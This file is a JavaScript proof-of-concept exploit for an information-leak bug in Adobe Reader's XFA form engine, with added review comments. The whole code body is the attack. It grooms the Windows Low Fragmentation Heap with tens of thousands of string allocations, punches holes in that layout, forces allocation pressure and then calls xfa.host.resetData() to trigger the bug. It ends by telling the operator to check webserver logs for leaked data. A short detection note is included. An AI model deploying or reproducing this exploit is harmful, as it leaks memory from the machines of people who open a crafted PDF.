/**
* Adobe Reader Information Leak Exploit
*/
// Module-level array that keeps the strings allocated by groomLFH() alive.
// groomLFH() itself later nulls and deletes every 4th slot, so the array is
// intentionally left sparse (holes between live entries).
var chunks = [];
/**
 * Heap-grooming helper.
 *
 * Builds a source string of `size` copies of the UTF-16 code unit 0x4142
 * (what unescape("%u4142") yields), pushes `count` derived strings onto the
 * global `chunks` array, then frees every 4th entry of that array.
 *
 * NOTE(review): "LFH" in the name refers to the Windows Low Fragmentation
 * Heap; nothing in this code verifies where the allocations land — that is
 * the author's assumption, not something the script checks.
 * NOTE(review): unescape() is a deprecated legacy global; it is kept here
 * because the exact allocation pattern is what the script relies on.
 *
 * @param {number} size  number of code units in the source string; each stored
 *                       entry is substr(0, (size - 2) / 2) of it, upper-cased
 *                       (with the caller's 0x58 that is 43 code units)
 * @param {number} count number of entries pushed onto `chunks`
 */
const groomLFH = (size, count) => {
  var string = unescape("%u4142").repeat(size);
  for (var i = 0; i < count; i++) {
    // The value stored is the result of substr(...).toUpperCase(); the
    // intermediate substring is not retained.
    chunks.push(string.substr(0, (size - 2) / 2).toUpperCase());
  }
  // Punch holes: null then `delete` every 4th slot. `delete` on an array
  // index leaves a hole without changing `chunks.length`, so freed slots end
  // up interleaved with live ones. Both loops reuse the same hoisted `var i`.
  for (var i = 0; i < chunks.length; i += 4) {
    chunks[i] = null;
    delete chunks[i];
  }
};
/**
 * Allocation-pressure helper.
 *
 * Creates a string of "GC" repeated 0x100000 times (2 * 0x100000 UTF-16 code
 * units) and calls substr(0, 0x100000) on it 1000 times, discarding every
 * result. The name states the intent — provoking a garbage-collection pass —
 * but JavaScript offers no way to force one; whether the engine actually
 * collects here is an assumption the rest of the script depends on.
 */
const triggerGC = () => {
  var string = "GC".repeat(0x100000);
  for (var i = 0; i < 1000; i++) {
    // Result is discarded; presumably only the transient allocation is wanted.
    string.substr(0, 0x100000);
  }
};
/**
 * Entry point of the proof of concept.
 *
 * The steps run in a fixed order that the script relies on: groom the heap
 * via groomLFH(0x58, 30000), apply allocation pressure via triggerGC(), then
 * call xfa.host.resetData(). The author's own comments mark the resetData()
 * call as the essential trigger, and the closing message states that the
 * leaked data only becomes visible after the user interacts with the form
 * and the submission reaches a web server.
 *
 * xfa.isPropertySpecified(...) is passed human-readable progress strings
 * rather than property names, so it appears to be used as a progress/log
 * channel rather than as a genuine property query — verify against the
 * host's XFA scripting reference.
 *
 * Detection note: a form script that allocates tens of thousands of short
 * strings, churns a multi-megabyte string, and then calls host.resetData()
 * is an unusual pattern for a legitimate XFA form and is a reasonable
 * static indicator when triaging PDF/XFA content.
 */
const exploit = () => {
  xfa.isPropertySpecified("[+] Starting Adobe Reader information leak exploit");
  //
  // Groom the heap
  //
  xfa.isPropertySpecified("[+] Grooming LFH");
  groomLFH(0x58, 30000);
  //
  // Trigger garbage collection
  //
  xfa.isPropertySpecified("[+] Triggering Garbage Collection");
  triggerGC();
  //
  // Reset XFA data which is essential to trigger the bug
  //
  xfa.isPropertySpecified("[+] Resetting XFA data");
  xfa.host.resetData();
  xfa.isPropertySpecified("[+] Now click on the form and check webserver logs");
};
//
// Trigger the exploit
//
// Run the PoC once when the script is evaluated. Any exception (presumably
// e.g. `xfa` or `xfa.host` not being available in the current context) is
// surfaced to the user via app.alert rather than swallowed.
try {
  exploit();
} catch (e) {
  app.alert(e);
}